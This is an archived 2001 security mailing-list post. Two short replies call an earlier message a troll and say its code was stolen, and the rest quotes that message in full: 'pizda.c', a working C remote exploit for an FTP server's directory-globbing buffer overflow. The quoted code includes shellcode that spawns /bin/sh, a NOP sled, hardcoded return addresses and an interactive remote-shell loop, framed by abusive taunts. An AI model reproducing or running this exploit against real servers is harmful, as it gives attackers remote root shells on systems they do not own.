Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Troll (was: RE: Another sploit makes 2 in one day)

From: "Russ Spooner" <labrat () interrorem com>
Date: Thu, 7 Jun 2001 10:34:57 +0100
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Um, haven't you guys ever been trolled before?

The worst thing you can do is reply to a luser like that...

I know a few sites will start archiving the "exploit" and giving him
credit for someone elses code, but other than notify the gullible it
is probably best to ignore him and get SF to stop authorising his
posts.

Otherwise these lists will get as bad as /.

BTW I dont want to perpeutate this, though... so mail me in private
rather than to the list with flames...

Russ

- -----------------------------------------+
Russ Spooner     (Mobile : 07771 544971) |
Interrorem: Network Security Specialists |
Software vulnerability testing & defence |
Protecting business : www.interrorem.com |



-----Original Message-----
From: Brad Doctor [mailto:bdoctor () ps-ax com]
Sent: 07 June 2001 05:01
To: Fsck Theo Deraadt
Cc: misc () openbsd org; vuln-dev () securityfocus com;
bugtraq () securityfocus com; submissions () packetstorm securify com;
security () openbsd org; theo () openbsd org
Subject: Re: Another sploit makes 2 in one day


I have no problem at all with this sort of thing, but it bothers me
when  people steal code and call it their own.  That is just
pathetic.

http://www.securityfocus.com/templates/archive.pike?list=1&mid=17692
2  

-brad



At 12:47 PM 6/6/2001 -0700, Fsck Theo Deraadt wrote:

So openbsd'ers complained to my mail provider because
they dont like when people show them up with code to
prove they lie about things and try to hush up
everyone. Its okay though no bad feelings so here it
is in your face pizda.c

//
// Pizda.c
// Hello all I have to now post this because I keep it
low key
// for long for my love of Openbsd but after Theo lied
to all
// I decided to release this to the public domain to
show what
// all claim no one could do which is prove them wrong
so here
// it go for all to see how fast they try to fix
before some
// people see how much problems this things cause.
// copyraadt 2001 by Jigglypuff of HackMasterZ
// Theo: kurite moju trubku
//



#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

extern char *optarg;
static int debug;
int cflag, lflag, sflag;

char shellcode[] =
"\x31\xc0\x50\x50\xb0\xb7\xcd\x80"
"\x58\x50\x66\x68\x2e\x2e\x89\xe1"
"\x50\x51\x50\xb0\x05\xcd\x80\x89"
"\xc3\x58\x50\x68\x61\x64\x66\x61"
"\x89\xe2\x66\x68\x6d\x01\x52\x50"
"\xb0\x88\xcd\x80\xb0\x3d\xcd\x80"
"\x53\x50\xb0\x01\x83\xc0\x0c\xcd"
"\x80\x51\x50\x31\xc9\xb1\x64\xb0"
"\x0c\xcd\x80\xe2\xfa\xb0\x3d\xcd"
"\x80\x31\xc0\x50\x68\x2f\x2f\x73"
"\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x50\x53\x50\x54\x53\xb0\x3b\x50"
"\xcd\x80\xc3";

#define THEO "THEO ftp\r\n"
#define SUXX "SUXX -user@\r\n"

void usage(const char *);
void docmd(int s, const char *cmd, int print);
void communicate(int s);

int main(int argc, char *argv[])
{
  char expbuf[512] = "LIST ", *basedir, option;
  char commandbuf[512] = "", *hostname;
  int cnt, dirlen, explen, sendlen;
  int s, port = 21, pad;
  long retaddr;
  struct sockaddr_in sin;
  struct hostent *he;

  while((option = getopt(argc, argv, "dc:l:p:s:")) !=
-1)
    switch(option)
      {
      case 'd':
        debug++;
        break;
      case 'c':
        cflag = 1;
        basedir = optarg;
        break;
      case 'l':
        lflag = 1;
        dirlen = atoi(optarg);
        if(dirlen < 16)
          {
            usage(argv[0]);
            exit(0);
          }
        break;
      case 'p':
        port = atoi(optarg);
        break;
      case 's':
        sflag = 1;
        retaddr = strtoul(optarg, 0, 0);
        break;
      default:
        usage(argv[0]);
        exit(0);
      }

  if(!cflag || !lflag)
    {
      usage(argv[0]);
      exit(0);
    }

  if(argc - optind == 1)
    hostname = argv[optind];
  else
    {
      usage(argv[0]);
      exit(0);
    }

  if((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
      perror("socket");
      exit(1);
    }

  if((he = gethostbyname(hostname)) == NULL)
    {
      herror(hostname);
      exit(0);
    }
  memset(&sin, 0, sizeof(struct sockaddr_in));
  sin.sin_family = AF_INET;
  sin.sin_port = htons(port);
  memcpy(&sin.sin_addr, he->h_addr_list[0],
sizeof(struct in_addr));
  if(connect(s, (struct sockaddr *) &sin,
sizeof(struct sockaddr_in)) == -1)
    {
      perror("connect");
      exit(0);
    }

  if(debug)
    fprintf(stderr, "// basedir = \"%s\"\n", basedir);

  for(cnt = 0; cnt < 1024/(dirlen+4)-1; cnt++)
    strcat(expbuf, "*/../");
  strcat(expbuf, "*/");
  if(debug)
    fprintf(stderr, "// expbuf = \"%s\"\n", expbuf);

  explen = cnt*(dirlen+4) + dirlen + 1;
  if(debug)
    fprintf(stderr, "// explen = %d\n", explen);

  sendlen = strlen(expbuf);
  if(debug)
    fprintf(stderr, "// sendlen = %d\n", sendlen);

  docmd(s, "", 0);

  docmd(s, THEO, 0);
  docmd(s, SUXX, 1);

  snprintf(commandbuf, sizeof(commandbuf), "CWD
%s\r\n", basedir);
  docmd(s, commandbuf, 1);

  pad = 1027 - explen;
  if(debug)
    fprintf(stderr, "// pad = %d\n", pad);

  for(; pad >= 0; pad--)
    strcat(expbuf, "x");

  if(!sflag)
    {
      switch(dirlen)
        {
        case 16:
          retaddr = 0xdfbeab60;
        case 26:
          retaddr = 0xdfbefe40;
        default:
          retaddr = 0xdfbeba20 + (dirlen-17)*0x9c0;
        }
      retaddr+=20;
    }

  fprintf(stderr, "retaddr = %.8lx\n", retaddr);
  strncat(expbuf, (char *) &retaddr, 4);

  for(cnt = strlen(expbuf); cnt <
508-strlen(shellcode); cnt++)
    strcat(expbuf, "\x90");

  strcat(expbuf, shellcode);

  strcat(expbuf, "\r\n");

  fprintf(stderr, "Press EnTeR.."); fflush(stderr);
  fgets(commandbuf, sizeof(commandbuf)-1, stdin);

  docmd(s, expbuf, 0);

  fprintf(stderr, "remember Theo is a liar
\"adfa\"-dir\n");
  communicate(s);

  return 0;
}

void usage(const char *s)
{
  fprintf(stderr, "Usage %s [-s retaddr] [-d] -c dir
-l dirlen(>=16) [-p port] hostname\n", s);
}

void docmd(int s, const char *cmd, int print)
{
  char uglybuf[1024];
  int len;
  fd_set rfds;
  struct timeval tv;

  len = strlen(cmd);
  if(debug)
    {
      write(STDERR_FILENO, "\\\\ ", 3);
      write(STDERR_FILENO, cmd, len);
    }
  if(send(s, cmd, len, 0) != len)
    {
      perror("send");
      exit(0);
    }

  FD_ZERO(&rfds);
  FD_SET(s, &rfds);
  tv.tv_sec = 1;
  tv.tv_usec = 0;
  select(s+1, &rfds, NULL, NULL, &tv);
  if(FD_ISSET(s, &rfds))
    {
      if((len = recv(s, uglybuf, sizeof(uglybuf), 0))
< 0)
        {
          perror("recv");
          exit(0);
        }
      if(len == 0)
        {
          fprintf(stderr, "EOF on socket. Sorry.\n");
          exit(0);
        }
      if(debug || print)
        {
          write(STDERR_FILENO, "// ", 3);
          write(STDERR_FILENO, uglybuf, len);
        }
    }
}

void communicate(int s)
{
  char buf[1024];
  int len;
  fd_set rfds;

  while(1)
    {
      FD_ZERO(&rfds);
      FD_SET(STDIN_FILENO, &rfds);
      FD_SET(s, &rfds);
      select(s+1, &rfds, NULL, NULL, NULL);
      if(FD_ISSET(STDIN_FILENO, &rfds))
        {
          if((len = read(STDIN_FILENO, buf,
sizeof(buf))) <= 0)
            return;
          if(send(s, buf, len, 0) == -1)
            return;
        }
      if(FD_ISSET(s, &rfds))
        {
          if((len = recv(s, buf, sizeof(buf), 0)) <=
0)
            return;
          if(write(STDOUT_FILENO, buf, len) == -1)
            return;
        }
    }
}




__________________________________________________
Do You Yahoo!?
Get personalized email addresses from Yahoo! Mail - only $35
a year!  http://personal.mail.yahoo.com/


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>

iQA/AwUBOx9KwVKMcg0VZCu/EQIlbACgjLXOLn4VXMWzLVlubwTzw84mkhQAoOLk
PifgvvoXTU27uKzrZ4eBrPC5
=THgO
-----END PGP SIGNATURE-----
Previous By Date Next
Previous By Thread Next

Current thread: